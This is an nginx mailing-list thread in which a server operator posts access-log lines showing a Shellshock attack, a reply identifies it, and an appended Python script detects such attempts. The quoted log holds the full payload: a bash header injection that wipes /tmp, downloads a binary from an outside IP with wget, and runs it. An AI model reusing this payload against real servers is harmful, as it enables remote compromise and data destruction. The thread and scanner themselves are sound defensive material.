Re: Suspicious log records

Robert Paprocki
October 22, 2016 12:58PM
Looks like a shellshock attempt. Provided that you're running a modern version of bash there's nothing to be done. Well, you could drop requests from those IPs if you see fit.

Welcome to the wild world of running a public server!

> On Oct 22, 2016, at 03:19, janro <nginx-forum@forum.nginx.org> wrote:
>
> Hi everyone.
>
> I'm a newbie with Nginx and with servers, and I thought to ask your opinion
> about the log input I noticed from last night.
>
> There's clearly some sort of malicious attempt in access.log which is
> repeated four times. In error.log there are only 'closed keepalive connection'
> records, which match those four attempts.
>
> Everything runs fine on the server side. I'd just like to know: is this just a
> normal day in the world of server logs, or something critical that needs
> action?
>
> Access.log
>
> 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
> chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo
> /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
> >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
> /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
>
> Error.log
>
> 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
> keepalive connection
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
>
> _______________________________________________
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

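As an added example (not code from the thread or from nginx), here is a small Python scanner that parses nginx `combined` access-log lines, undoes nginx's `\xHH` field escaping, flags the Shellshock trigger `() { :; };` in the Referer and User-Agent fields, counts attempts per source IP, and emits the `deny` lines the reply suggests. The sample lines are constructed, shortened from the post's log (the benign line's IP is a made-up TEST-NET address), and the parser assumes the post's format of `combined` plus one trailing quoted field.

```python
import re
from collections import Counter

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
# (the post's log carries one extra trailing "-" field, which match() simply ignores)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Shellshock trigger: an empty bash function definition followed by trailing commands
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
# nginx writes quotes and non-printable bytes inside log fields as \xHH escapes
HEX_ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')

# Constructed sample: two lines shortened from the post's access.log plus one benign hit
SAMPLE_LOG = [
    r'61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 '
    r'"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;/tmp/Run.sh\x22" '
    r'"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;/tmp/Run.sh\x22" "-"',
    r'61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 '
    r'"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;/tmp/Run.sh\x22" "-" "-"',
    r'198.51.100.7 - - [22/Oct/2016:00:15:02 +0300] "GET /index.html HTTP/1.1" 200 612 '
    r'"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/49.0" "-"',
]

def unescape_nginx(field):
    """Undo nginx's \\xHH escaping so the payload is matched as a shell would see it."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), field)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def shellshock_fields(entry):
    """Names of the header fields (referer, agent) carrying a Shellshock trigger."""
    return [f for f in ("referer", "agent")
            if SHELLSHOCK_RE.search(unescape_nginx(entry[f]))]

def scan(lines):
    """Count Shellshock attempts per source IP over access-log lines."""
    attempts = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry and shellshock_fields(entry):
            attempts[entry["ip"]] += 1
    return attempts

def deny_directives(attempts, threshold=1):
    """nginx 'deny' lines for sources at or above the threshold, as the reply suggests."""
    return [f"deny {ip};" for ip, n in sorted(attempts.items()) if n >= threshold]
```

Pipe a real access.log into `scan()` line by line; a patched bash makes the payload inert, so the count is a measure of scanner noise rather than of compromise.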